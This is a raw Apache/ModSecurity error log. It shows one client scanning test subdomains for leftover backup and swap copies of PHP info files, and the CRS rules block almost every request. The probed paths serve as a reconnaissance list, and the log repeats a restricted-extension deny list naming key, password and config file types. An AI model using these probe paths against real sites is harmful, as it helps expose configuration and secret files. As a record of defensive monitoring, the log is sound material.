[Tue Nov 18 14:52:28.712598 2025] [:error] [pid 153863] [client 34.235.129.146:57504] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.bak"] [unique_id "aRx6HOo53hvRBsk5IfbhYQAAAAA"]
[Tue Nov 18 14:52:28.916600 2025] [:error] [pid 160906] [client 34.235.129.146:57672] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxQAAAAY"]
[Tue Nov 18 14:52:28.916912 2025] [:error] [pid 160906] [client 34.235.129.146:57672] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxQAAAAY"]
[Tue Nov 18 14:52:28.917054 2025] [:error] [pid 160906] [client 34.235.129.146:57672] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.backup"] [unique_id "aRx6HP7FUeIdxVPAs5igxQAAAAY"]
[Tue Nov 18 14:52:29.059746 2025] [:error] [pid 166221] [client 34.235.129.146:57674] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.swp"] [unique_id "aRx6HUZMvs5yquz1yvHTpQAAAAM"]
[Tue Nov 18 14:52:29.060132 2025] [:error] [pid 166221] [client 34.235.129.146:57674] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.swp"] [unique_id "aRx6HUZMvs5yquz1yvHTpQAAAAM"]
[Tue Nov 18 14:52:29.060301 2025] [:error] [pid 166221] [client 34.235.129.146:57674] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.swp"] [unique_id "aRx6HUZMvs5yquz1yvHTpQAAAAM"]
[Tue Nov 18 14:52:29.169090 2025] [authz_core:error] [pid 160239] [client 34.235.129.146:57706] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/phpinfo.php.save
[Tue Nov 18 14:52:29.176930 2025] [:error] [pid 166208] [client 34.235.129.146:57732] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRx6HQcM3DmIMKVPkqcQkwAAAAE"]
[Tue Nov 18 14:52:29.177261 2025] [:error] [pid 166208] [client 34.235.129.146:57732] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRx6HQcM3DmIMKVPkqcQkwAAAAE"]
[Tue Nov 18 14:52:29.177425 2025] [:error] [pid 166208] [client 34.235.129.146:57732] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/php_info.php.old"] [unique_id "aRx6HQcM3DmIMKVPkqcQkwAAAAE"]
[Tue Nov 18 14:52:29.257290 2025] [authz_core:error] [pid 166202] [client 34.235.129.146:57690] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/info.php.save
[Tue Nov 18 14:52:29.334895 2025] [:error] [pid 160881] [client 34.235.129.146:57722] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.bak"] [unique_id "aRx6HcKvHpCFfzvQgqZe0wAAAAQ"]
[Tue Nov 18 14:52:29.335233 2025] [:error] [pid 160881] [client 34.235.129.146:57722] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.bak"] [unique_id "aRx6HcKvHpCFfzvQgqZe0wAAAAQ"]
[Tue Nov 18 14:52:29.335394 2025] [:error] [pid 160881] [client 34.235.129.146:57722] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.bak"] [unique_id "aRx6HcKvHpCFfzvQgqZe0wAAAAQ"]
[Tue Nov 18 14:52:29.527352 2025] [:error] [pid 160239] [client 34.235.129.146:57752] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.swp"] [unique_id "aRx6He1NcONF8naoxQFfAQAAAAw"]
[Tue Nov 18 14:52:29.527696 2025] [:error] [pid 160239] [client 34.235.129.146:57752] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.swp"] [unique_id "aRx6He1NcONF8naoxQFfAQAAAAw"]
[Tue Nov 18 14:52:29.527874 2025] [:error] [pid 160239] [client 34.235.129.146:57752] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.swp"] [unique_id "aRx6He1NcONF8naoxQFfAQAAAAw"]
[Tue Nov 18 14:52:29.616672 2025] [:error] [pid 166202] [client 34.235.129.146:57740] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.bak"] [unique_id "aRx6HbjjT4drRne9BbQuswAAAAk"]
[Tue Nov 18 14:52:29.616965 2025] [:error] [pid 166202] [client 34.235.129.146:57740] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.bak"] [unique_id "aRx6HbjjT4drRne9BbQuswAAAAk"]
[Tue Nov 18 14:52:29.617113 2025] [:error] [pid 166202] [client 34.235.129.146:57740] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.bak"] [unique_id "aRx6HbjjT4drRne9BbQuswAAAAk"]
[Tue Nov 18 14:52:29.618873 2025] [:error] [pid 163656] [client 34.235.129.146:57910] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.swp"] [unique_id "aRx6HcCoCYNOyUBImXwJNgAAAAc"]
[Tue Nov 18 14:52:29.619122 2025] [:error] [pid 163656] [client 34.235.129.146:57910] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.swp"] [unique_id "aRx6HcCoCYNOyUBImXwJNgAAAAc"]
[Tue Nov 18 14:52:29.619262 2025] [:error] [pid 163656] [client 34.235.129.146:57910] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.swp"] [unique_id "aRx6HcCoCYNOyUBImXwJNgAAAAc"]
[Tue Nov 18 14:52:29.918787 2025] [:error] [pid 153863] [client 34.235.129.146:57926] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.bak"] [unique_id "aRx6Heo53hvRBsk5IfbhZQAAAAA"]
[Tue Nov 18 14:52:29.919083 2025] [:error] [pid 153863] [client 34.235.129.146:57926] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.bak"] [unique_id "aRx6Heo53hvRBsk5IfbhZQAAAAA"]
[Tue Nov 18 14:52:29.919253 2025] [:error] [pid 153863] [client 34.235.129.146:57926] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/test.php.bak"] [unique_id "aRx6Heo53hvRBsk5IfbhZQAAAAA"]
[Tue Nov 18 14:52:30.327994 2025] [:error] [pid 163656] [client 34.235.129.146:58004] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.swp"] [unique_id "aRx6HsCoCYNOyUBImXwJOAAAAAc"]
[Tue Nov 18 14:52:30.328312 2025] [:error] [pid 163656] [client 34.235.129.146:58004] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.swp"] [unique_id "aRx6HsCoCYNOyUBImXwJOAAAAAc"]
[Tue Nov 18 14:52:30.328465 2025] [:error] [pid 163656] [client 34.235.129.146:58004] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.swp"] [unique_id "aRx6HsCoCYNOyUBImXwJOAAAAAc"]
[Tue Nov 18 14:52:30.347118 2025] [:error] [pid 160881] [client 34.235.129.146:57952] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRx6HsKvHpCFfzvQgqZe1gAAAAQ"]
[Tue Nov 18 14:52:30.347428 2025] [:error] [pid 160881] [client 34.235.129.146:57952] [client 34.235.129.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRx6HsKvHpCFfzvQgqZe1gAAAAQ"]
[Tue Nov 18 14:52:30.347593 2025] [:error] [pid 160881] [client 34.235.129.146:57952] [client 34.235.129.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/info.php.old"] [unique_id "aRx6HsKvHpCFfzvQgqZe1gAAAAQ"]
[Tue Nov 18 14:52:30.506650 2025] [authz_core:error] [pid 166223] [client 34.235.129.146:58136] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/info.php
[Tue Nov 18 14:52:30.552564 2025] [:error] [pid 160239] [client 34.235.129.146:57994] [client 34.235.129.146] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/phpinfo.php.old"] [unique_id "aRx6Hu1NcONF8naoxQFfBAAAAAw"]
